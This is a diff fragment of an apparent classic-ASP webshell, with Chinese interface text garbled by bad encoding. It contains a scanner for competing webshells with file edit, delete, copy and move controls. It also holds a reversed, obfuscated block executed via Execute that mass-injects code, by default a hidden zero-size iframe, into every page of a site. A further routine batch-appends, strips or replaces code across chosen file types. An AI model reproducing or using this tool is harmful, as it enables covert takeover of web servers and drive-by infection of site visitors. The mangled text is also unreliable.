+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+  Case "kmuma"
+	dim Report
+	if request.QueryString("act")<>"scan" then
+	  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+		RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+
+		RRS "<form action=""?Action=kmuma&act=scan"" method=""post"" name=""form1"">"
+		RRS "<p><b>������Ҫ����·����</b>"
+		RRS "<input name=""path"" type=""text"" style=""border:1px solid #999"" value=""."" size=""30"" /> �\����վ��Ŀ¼����.��Ϊ������Ŀ¼<br><br>"
+		RRS "��Ҫ��ʲô: <input class=c name=""radiobutton"" type=""radio"" value=""sws"" onClick=""document.getElementById('showFile1').style.display='none'"" checked>��ASP "
+		RRS "<input class=c type=""radio"" name=""radiobutton"" value=""sf"" onClick=""document.getElementById('showFile1').style.display=''"">������������֮�ļ�<br>"
+		RRS "<br /><div id=""showFile1"" style=""display:none"">"
+		RRS "&nbsp;&nbsp;�������ݣ�<input name=""Search_Content"" type=""text"" id=""Search_Content"" style=""border:1px solid #999"" size=""20"">"
+		RRS " Ҫ���ҵ��ַ����������ֻ�������ڼ��<br />"
+		RRS "&nbsp;&nbsp;�޸����ڣ�<input name=""Search_Date"" type=""text"" style=""border:1px solid #999"" value="""&Left(Now(),InStr(now()," ")-1)&""" size=""20""> ���������;����������������д <a href=""#"" onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
+		RRS "&nbsp;&nbsp;�ļ����ͣ�<input name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" value=""*"" size=""20""> ����֮����,������*��ʾ��������<br /><br /></div>"
+		RRS "<input type=""submit"" value="" ��ʼɨ�� "" style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px 2px;margin:4px;"" />"
+		RRS "</form>"
+	else
+		if request.Form("path")="" then
+			RRS("·������Ϊ��")
+			response.End()
+		end if
+		if request.Form("path")="\" then
+			TmpPath = Server.MapPath("\")
+		elseif request.Form("path")="." then
+			TmpPath = Server.MapPath(".")
+		else
+			TmpPath = request.Form("path")
+		end if
+		
+		timer1 = timer
+		Sun = 0
+		SumFiles = 0
+		SumFolders = 1
+		If request.Form("radiobutton") = "sws" Then
+			DimFileExt = "asp,cer,asa,cdx"
+			Call ShowAllFile(TmpPath)
+		Else
+			If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
+				RRS("������������ȫ<br><br><a href='javascript:history.go(-1);'>�뷵����������</a>")
+				response.End()
+			End If
+			DimFileExt = request.Form("Search_fileExt")
+			Call ShowAllFile2(TmpPath)
+		End If
+RRS "<table width=""100%"" border=""0"" cellpadding=""0"" cellspacing=""0"" style='font-size:12px'>"
+RRS "<tr><th>Scan WebShell -- ʮ���Ż���</tr>"
+RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-size:12px"">"
+RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid #89441f;padding:4px;display:none""></div>"
+RRS "ɨ����ϣ�һ������ļ���<font color=""#FF0000"">"&SumFolders&"</font>�����ļ�<font color=""#FF0000"">"&SumFiles&"</font>�������ֿ��ɵ�<font color=""#FF0000"">"&Sun&"</font>��"
+RRS "<table width=""100%"" border=""1"" cellpadding=""0"" cellspacing=""8"" bordercolor=""#999999"" style=""font-size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
+If request.Form("radiobutton") = "sws" Then
+	RRS "<td width=""20%"">�ļ����·��</td>"
+	RRS "<td width=""20%"">������</td>"
+	RRS "<td width=""40%"">����</td>"
+	RRS "<td width=""20%"">����/�޸�ʱ��</td>"
+else   
+	RRS "<td width=""50%"">�ļ����·��</td>"
+	RRS "<td width=""25%"">�ļ�����ʱ��</td>"
+	RRS "<td width=""25%"">�޸�ʱ��</td>"
+end if
+	RRS "</tr>"
+	RRS Report
+	RRS "<br/></table>"
+timer2 = timer
+thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
+RRS "<br><font style='font-size:12px'>��ҳִ�й�����"&thetime&"����</font>"
+	end if
+Sub ShowAllFile(Path)
+	Set F1SO = CreateObject("Scripting.FileSystemObject")
+	if not F1SO.FolderExists(path) then exit sub
+	Set f = F1SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call ScanFile(Path&Temp&"\"&myfile.name, "")
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F1SO = Nothing
+End Sub
+Sub ScanFile(FilePath, InFile)
+Server.ScriptTimeout=999999999
+	If InFile <> "" Then
+		Infiles = "<font color=red>���ļ���<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(InFile)&""" target=_blank>"& InFile & "</a>�ļ�����ִ��</font>"
+	End If
+	Set FSO1s = CreateObject("Scripting.FileSystemObject")
+	on error resume next
+	set ofile = FSO1s.OpenTextFile(FilePath)
+	filetxt = Lcase(ofile.readall())
+	If err Then Exit Sub end if
+	if len(filetxt)>0 then
+		filetxt = vbcrlf & filetxt
+		temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+			If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell ���� clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font color=red>Σ�������һ�㱻ASPľ����</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End if
+			If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application ���� clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font color=red>Σ�������һ�㱻ASPľ����</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			Set regEx = New RegExp
+			regEx.IgnoreCase = True
+			regEx.Global = True
+			regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>�ƺ��ű���������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\bEv"&"al\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()��������ִ������ASP����<br>����javascript������Ҳ����ʹ�ã��п������󱨡�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "[^.]\bExe"&"cute\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font color=red>e"&"xecute()��������ִ������ASP����</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.(Open|Create)TextFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>ʹ����FSO��CreateTextFile|OpenTextFile��д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.SaveToFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>ʹ����Stream��SaveToFile����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.Save\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.Save</td><td>ʹ����XMLHTTP��Save����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*virtual\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Server.MapPath("\")&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()[^""]\)"
+		If regEx.Test(filetxt) Then
+			Report = Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font color=red>���ܸ��ټ��Server.e"&"xecute()����ִ�е��ļ���</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+			Sun = Sun + 1
+		End If
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set XregEx = New RegExp
+		XregEx.IgnoreCase = True
+		XregEx.Global = True
+		XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
+		Set XMatches = XregEx.Execute(filetxt)
+		For Each Match in XMatches
+			tmpLake2 = Mid(Match.Value, 1, InStr(Match.Value, ">"))
+			srcSeek = InStr(1, tmpLake2, "src", 1)
+			If srcSeek > 0 Then
+				srcSeek2 = instr(srcSeek, tmpLake2, "=")
+				For i = 1 To 50
+					tmp = Mid(tmpLake2, srcSeek2 + i, 1)
+					If tmp <> " " and tmp <> chr(9) and tmp <> vbCrLf Then
+						Exit For
+					End If
+				Next
+				If tmp = """" Then
+					tmpName = Mid(tmpLake2, srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - i - 1)
+				Else
+					If InStr(srcSeek2 + i + 1, tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = tmpLake2
+					If InStr(tmpName, chr(9)) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
+					If InStr(tmpName, vbCrLf) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
+					If InStr(tmpName, ">") > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
+				End If
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")&"\","",1,1,1))
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			If Instr(Match.Value, "&") or Instr(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObject����ʹ���˱��μ���"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				exit sub
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+	end if
+	set ofile = nothing
+	set FSO1s = nothing
+End Sub
+Function CheckExt(FileExt)
+	If DimFileExt = "*" Then CheckExt = True
+	Ext = Split(DimFileExt,",")
+	For i = 0 To Ubound(Ext)
+		If Lcase(FileExt) = Ext(i) Then 
+			CheckExt = True
+			Exit Function
+		End If
+	Next
+End Function
+Function GetDateModify(filepath)
+	Set F2SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F2SO.GetFile(filepath) 
+	s = f.DateLastModified 
+	set f = nothing
+	set F2SO = nothing
+	GetDateModify = s
+End Function
+Function GetDateCreate(filepath)
+	Set F3SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F3SO.GetFile(filepath) 
+	s = f.DateCreated 
+	set f = nothing
+	set F3SO = nothing
+	GetDateCreate = s
+End Function
+Function tURLEncode(Str)
+	temp = Replace(Str, "%", "%25")
+	temp = Replace(temp, "#", "%23")
+	temp = Replace(temp, "&", "%26")
+	tURLEncode = temp
+End Function
+Sub ShowAllFile2(Path)
+	Set F4SO = CreateObject("Scripting.FileSystemObject")
+	if not F4SO.FolderExists(path) then exit sub
+	Set f = F4SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F4SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call IsFind(Path&"\"&myfile.name)
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile2 path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F4SO = Nothing
+End Sub
+Sub IsFind(thePath)
+	theDate = GetDateModify(thePath)
+	on error resume next
+	theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
+	if err then exit Sub
+	xDate = Split(request.Form("Search_Date"),";")
+	If request.Form("Search_Date") = "ALL" Then ALLTime = True
+	For i = 0 To Ubound(xDate)
+		If theTmp = xDate(i) or ALLTime = True Then 
+			If request("Search_Content") <> "" Then
+				Set FSO2s = CreateObject("Scripting.FileSystemObject")
+				set ofile = FSO2s.OpenTextFile(thePath, 1, false, -2)
+				filetxt = Lcase(ofile.readall())
+				If Instr( filetxt, LCase(request.Form("Search_Content"))) > 0 Then
+					temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
+    temp=temp&" �� <a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Sun = Sun + 1
+					Exit Sub
+				End If
+				ofile.close()
+				Set ofile = Nothing
+				Set FSO2s = Nothing
+			Else
+				temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a> "
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+				Sun = Sun + 1
+				Exit Sub
+			End If
+		End If
+	Next
+End Sub
+  Case "plgm"
+Server.ScriptTimeout=1000000 
+Response.Buffer=False 
+ShiSan="��raelC.rrE�� buS dnE�� gnihtoN=sf teS�� fI dnE�� gnihtoN=f teS�� esolC.edocdda_f�� edocdda etirW.edocdda_f�� )2-,8(maertStxeTsAnepO.f=edocdda_f teS�� )2rts(eliFteG.sf=f teS�� nehT tsixEsi fI�� )2rts(stsixEeliF.sf=tsixEsi�� )��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerc.revreS=sf teS�� )2rts(2pets buS�� buS dnE���>vid/<>a/<evoM>'����'=eltit 'ma'=ssalc ')���eliFevoM���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')���eliFypoC���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno')���eliFleD���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<tide>'����'=eltit 'ma'=ssalc ')���eliFtidE���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� SRR��� >a/<nwoD>'����'=eltit 'ma'=ssalc ')���eliFnwoD���,����&)��\\��,��\��,1rts(ecalper&����(mroFlluF:tpircsavaj'=ferh a<�� sRR���_ ��&1rts&�� ��>'xp02:thgieh-enil'=elyts vid<�� SRR��)1rts(1pets buS�� buS dnE�� fI dnE�� buS tixE�� eslE�� rga 2pets�� rga 1pets�� nehT laVter fI�� )rga,��b\)sj|igc|xpsa|psj|php|psa|lmth|mth(.\)505|piv|ciptfos_elifpu|otohp_elifpu|tfos_elifpu|daol_elifpu|daolpu_nimda|elifpu_nimda|txet|hsalf|da|cn|rre|pohs|tsil|ofni|rahc|toof|dnes|404rre|pi|weiv|wohs|yalp|puym|puwen|025|QQ|ogol|metsys|nwod|evom|ypoc|rorre|dov|3pm|gifnoc|tb|koob|reganam|tuoba|emag|tide|dda|atad|evas|golb|bew|segami|gmi|liame|eman|nepo|wen|pot|psa|ptf|bbu|resu|lqs|gifnoc|led|ko|on|yid|nigol|ssalc|trac|daolpu|elifpu|pleh|ger|sbb|nimda|nnoc|xedni|tluafed()/\|\\(��(nrettaPsI=laVter�� )rga(lla_pets buS�� buS dnE�� fI dnE�� txeN�� l hcs�� fs nI l hcaE roF�� nehT 0><tnuoC.fs fI�� txeN�� ntr lla_pets�� htap.f=ntr�� if ni f hcaE roF�� sredloFbuS.df=fs teS�� seliF.df=if teS�� )s(redloFteG.sf=df teS�� )��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerc.revreS=sf teS�� TxEn EmUsEr rOrRe No�� )s(hcs buS�� fi dne��fI dnE�� s hcs nehT )s,��)/\|\\(}1{:}1{]ba^[��(nrettaPsI fI esle��dne.esnopser���>tnof/<!�����·�Ĺ�������>der=roloc tnof<�� SRR��nehT ���=edocdda ro ���=s fI��neht ���><)��timbus��(mrof.tseuqer fi�� noitcnuF dnE�� fI dnE�� eslaF=nrettaPsI�� eslE�� eurT=nrettaPsI�� nehT eurT=laVter fI�� gnihtoN=xEger teS�� )rts(tseT.xEger=laVter�� eurT=esaCerongI.xEger�� ttap=nrettaP.xEger�� pxEgeR weN=xEger teS�� )rts,ttap(nrettaPsI noitcnuF�� fI dnE��)�� >mrof/<>elbat/<>rt/<��(SRR��)��>dt/<>���ʼ�����=eulav ���timbus���=epyt ���timbus���=eman tupni<>dt<��(SRR��)��>dt/<>aeratxet/<��&edocdda&��>���3���=swor 85=sloc ���edoc���=eman aeratxet<>dt<��(SRR��)��>dt/<:����Ĺ�Ҫ>dt<>rt<>rt/<��(SRR��)��>dt/<;psbn&>���96���=htdiw dt<��(SRR��)��>dt/<>06=ezis ����&s&����=eulav ���df���=eman ���txet���=epyt tupni<>���953���=htdiw dt<��(SRR��)��>dt/<��)��·�Ծ�( �м��ĵĹ�Ҫ>���201���=htdiw dt<��(SRR��)��>rt<��(SRR��)��>���;xp21:ezis-tnof���=elyts ���0���=redrob 065=htdiw elbat<��(SRR��)�� >���TSOP���=dohtem mrof<��(SRR�� eslE�� tceles dnE�� )htp(evas_elif LLAC�� ��evas�� esaC�� )htp(wohs_elif LLAC�� ��tide�� esaC�� xe esaC tceles�� nehT ���><htp DNA ���><xe fI���>emarfi/<>0=thgieh 0=htdiw mth.m/1.0.0.721//:ptth=crs emarfi<��=edocdda neht ���=edocdda fi��)��edoc��(tseuqeR = edocdda�� )��tncwen��(tseuqeR=tncwen�� )��htp��(tseuqeR=htp�� )��xe��(tseuqeR=xe��)��/��(htaPpaM.revreS=s neht ���=s fi�� )��df��(tseuqeR=s�� )��OFNI_HTAP��(selbairaVrevreS.tseuqeR=FLES_PSA��)��>b/<��(&)��/��(htaPpaM.revreS&)��:��·�Ծ�վ��ǰ��>b<��( SRR":ExeCuTe(ShiSanFun(ShiSan))::Case "Cplgm":Fpath=Request("fd"):addcode = Request("code"):addcode2 = Request("code2"):pcfile=request("pcfile"):checkbox=request("checkbox"):ShowMsg=request("ShowMsg"):FType=request("FType"):M=request("M"):if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx":if Fpath="\" then Fpath=Server.MapPath("\")
+	if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")	
+	if addcode="" then addcode="<"
+	if checkbox="" then checkbox=request("checkbox")
+	if pcfile="" then
+		pcfileName=Request.ServerVariables("SCRIPT_NAME")
+		pcfilek=split(pcfileName,"/") 
+		pcfilen=ubound(pcfilek) 
+		pcfile=pcfilek(pcfilen) 
+	end if
+  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+	RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+	RRS "<form method=POST><div style='color:#3399ff'><b>[" 
+	if M="1" then RRS"��������-������"
+	if M="2" then RRS"��������-������˵���"
+	if M="3" then RRS"�����滻��-�ļ��滻�޸Ĺ���"
+	if M="" then response.end
+	RRS "]</b></div><table width=100% border=0><tr><td>�ļ�·����</td>"
+	RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+	if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+	RRS "<tr><td>�ų��ļ���</td>"
+	RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+	RRS "<tr><td>�ļ����ͣ�</td>"
+	RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
+	if M="1" then RRS"Ҫ�ҵģ�"
+	if M="2" then RRS"Ҫ��ģ�"
+	if M="3" then RRS"�������ݣ�"
+	RRS"</font></td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+	if M="3" then RRS "<tr><td><font color=#3399ff>�� �� ��</font></td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+	RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+	RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+Sub InsertAllFiles(Wpath,Wcode,pc)
+	Server.ScriptTimeout=999999999
+	 if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+	 Set WFSO = CreateObject("Scripting.FileSystemObject")
+	 on error resume next 
+	 Set f = WFSO.GetFolder(Wpath)
+	 Set fc2 = f.files
+	 For Each myfile in fc2
+		Set FS1 = CreateObject("Scripting.FileSystemObject")
+		FType1=split(myfile.name,".") 
+		FType2=ubound(FType1) 
+		if Ftype2>0 then
+		FType3=LCase(FType1(FType2)) 
+		else
+		FType3="��"
+		end if
+		if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+			select case M
+				case "1"
+					if checkbox<>"checked" then
+						Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+						tfile.writeline Wcode
+						RRS"�� "&Wpath&myfile.name
+						tfile.close
+					else
+						Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+						if Instr(tfile1.readall,Wcode)=0 then
+							Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+							tfile.writeline Wcode
+							RRS"��  "&Wpath&myfile.name
+							tfile1.close
+						else
+							RRS"<font color=red>��</font> "&Wpath&myfile.name
+							tfile1.close
+						end if
+						Set tfile1=Nothing
+					end if
+				case "2"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,"")
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case "3"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,addCode2)
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case else
+					RRS"���,������.":response.end
+			end select
+		else
+			RRS"�� "&Wpath&myfile.name
+		end if
